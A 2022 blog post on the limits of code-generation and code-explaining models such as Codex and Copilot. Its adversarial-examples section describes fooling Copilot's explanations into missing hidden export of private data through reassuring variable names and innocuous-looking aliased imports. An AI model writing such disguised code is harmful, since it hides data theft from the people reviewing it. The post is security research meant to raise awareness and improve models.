Evaluating code-generation models from an NLU perspective

7 min readFeb 19, 2022

In December 2021, there was a surge of activity around OpenAI Codex (powering GitHub Copilot and Replit), HuggingFace’s CodeParrot model, and code prompting with EleutherAI’s GPT-J. The models continue to improve and gain adoption:

And there continues to be research evaluating GPT-J (as it’s one of the few public models):

Code explanations

Though code-completion and syntax correction has been a programming staple for years, this generation of models generate functions and web content from prompts. OpenAI’s Codex also introduced code-explaining models, appearing to translate code into human-friendly terms. It’s unclear what data was used for training.
I opened a C# file in the OpenRA game codebase and asked it to explain this function:

/* 1. If the animation is completed, then it removes itself from the world. */

Note that the word ‘animation’ doesn’t appear anywhere in this snippet, or its file, or in related git commits. After some investigation, I found this code is called when ending videos. So Codex creates a plausible-sounding and sort-of-right explanation, but it’s important to remember it does not do this by reading or processing the actual codebase.

Limitations of language models

The NLP community’s experience with Large Language Models (LLMs) includes studying the misconception that models that read also understand text, and those that write also have intent in a human sense.
In my earliest projects with LSTMs, it was easy to learn grammar rules, and correct spelling errors in the Esperanto Wikipedia. The free output of the generative model was nonsense.

To actually understand what’s written has led to the term Natural Language Understanding (NLU). There’s deeper exploration of this in Bender and Koller’s Climbing towards NLU: On Meaning, Form, and Understanding in the Age of Data and in the famous Stochastic Parrots paper.

Keras creator François Chollet also frequently describes deep learning models as “locality-sensitive hashtables” and proposed a reasoning task (ARC) which could not simply be overcome with a mountain of training data.

Code models follow in the footsteps of GPT-2 and GPT-3. Though you can find many criticisms of GPT being prompted into racism and other stereotypes, generative models are particularly vulnerable to false premises. Suppose I give a model the sentence “I am carrying 100 elephants in __”. This type of model cannot backtrack. It knows that people carry things in only a few likely places (pocket, bag, luggage, car). To steer this sentence back to reality (“but these are toy elephants”) would be a multi-token journey through language very uncommon within one sample of text, so most models accept the premise and move on.

GPT-3 Curie does complete the sentence and challenge it:

Why do these examples matter? We’re trying to understand who we’re working with when we pair-program with today’s models. Are they an upgraded syntax checker, a plagiarist, a 10x programmer..?

Generative models in coding

One of the reasons that I frame this story around generative language models and the ‘elephants’ example is that reviewing code is a difficult problem and is not solely sequential / prompt-based.
Generative models append code, but cannot move backward (for example, to import libraries). When I propose a function def area_of_circle(radius): the suggestion is 3.14, unless I already imported the math library:

I would argue that a strictly first-to-last-line model would never be good at this because it has little to no context in the beginning, and would be unlikely to import math inside of a function.
Later on in a file, models’ internal probabilities can be used to measure surprisal. This could be a helpful indicator that my code should be rewritten, or that the code does not match my initial comments. As of yet, none of these systems have a UI to work those internal probabilities into suggestions, or (critically) to flag potentially dangerous code. More on that later.

In addition to the StackOverflow bad-then-good generation mentioned at the start of this post, models may suggest poor-quality code to match your style:

blog.andrewcantino.com/blog/2021/04/21/prompt-engineering-tips-and-tricks/

So today’s prompt models are nothing like working with someone who understands the intent of your work.

Facebook’s new CM3 generative model (trained on web page text, images, and HTML) is an alternative approach where one sub-section is <mask>-ed out, and then after the section is completed the model is asked to generate it.
This looks promising, but cannot resolve import issues (from later code, it will be evident what imports I am using, not which I should have used).

Fun with Adversarial Examples

Code-explaining models are trained on generalized code and explanations, so they trust imports and comments and variable names. They can be conned into ignoring code from bad actors.

Note that an explanation will change from time to time when you click “Ask Copilot”. Codex (as used in Copilot and Replit) is likely a GPT fine-tuned model to sample the top n probable tokens and then the top tokens to follow after that. This is great for testing this feature, but gives the illusion of parsing / interpreting / running the code before explaining it.

I had fun quickly putting together a code example where the feature almost always ignores that I’m exporting private data in the background:

The model likely has not seen code like this before. It does not have a reference for how to react. In some cases I’ve see it thinks a variable named safe_ip is… safe. A compiled code parser would not fall for this.
Again this is an example where the internal surprisal of the code-reading model, if visible to the user, could likely warn that something was amiss.

Is Adversarial Code a true vulnerability?

My initial goal is to spread awareness, create policies, and improve code model’s responses and use-cases.

I thought of three arguments against considering this topic seriously:

Humans running random code is the real threat. If an engineer is getting code directly from the web, you already have a problem.
Copying code from StackOverflow is a running joke in the programming world, but it happens.
Copilot’s novelty makes it difficult to say how engineers will treat it — if your office has no policy about running code-generation or code-explanation, you should assume that someone is trying it. Most public discourse about this was focused on copyright, so I think most users don’t consider security, and their trust will increase on higher-quality future versions of the product.
The example that you created is obviously wrong. How would you not notice? Adversarial examples are created for multiple reasons. Some are algorithmically tuned to defeat a model, some challenge understanding or generalization (a good model should pass the given test), and others are a proof of concept (if the model fails on known example X, then we anticipate it will fail in other future conditions Y).
I think it’s good to show a conspicuous example on Twitter to discuss how an AI ought to respond to this problem. If you have a tricky example or a huge demo just add an issue or PR.
There are too many workarounds. For example if import requests as math is a red flag, the attacker includes math.py to make it import math, or uses a totally new name like algorithm_king. This one will be challenging as long as Codex only looks at one snippet or file, and as long as importing and pip install-ing dependencies involves a great deal of trust in every language. Where I place this slice of research is on confounding the AI with obfuscated code, versus problems which could be caught with a linter / filename checker / other simple bash script.

Future work

I initially wrote this post to explain my idea to use one of the few public code generation models and datasets (CodeParrot) to measure surprisal on code examples. I’m particularly interested in missing imports, adversarial imports and variable names, and errors where the intent is given in a comment.

I suspect that sequential/generative models will need the code reordered to capture surprisal in one place, such as a long function followed by a single line comment ‘explaining’ what I expected that code did.
It makes me wonder if we’ll someday design our programming conventions and comments to encourage the models to check us?

# libraries to calculate surface area of a sphere: _
def surface_area(radius):
a = 4 * 3.14 * radius**2
return radius * 2
# did this return the correct surface area of a sphere: _

Update Feb 24: I recently got access to the Codex API to run some of these examples with more flexibility, and expand the dangerous attack checks into SQL generation and explanation.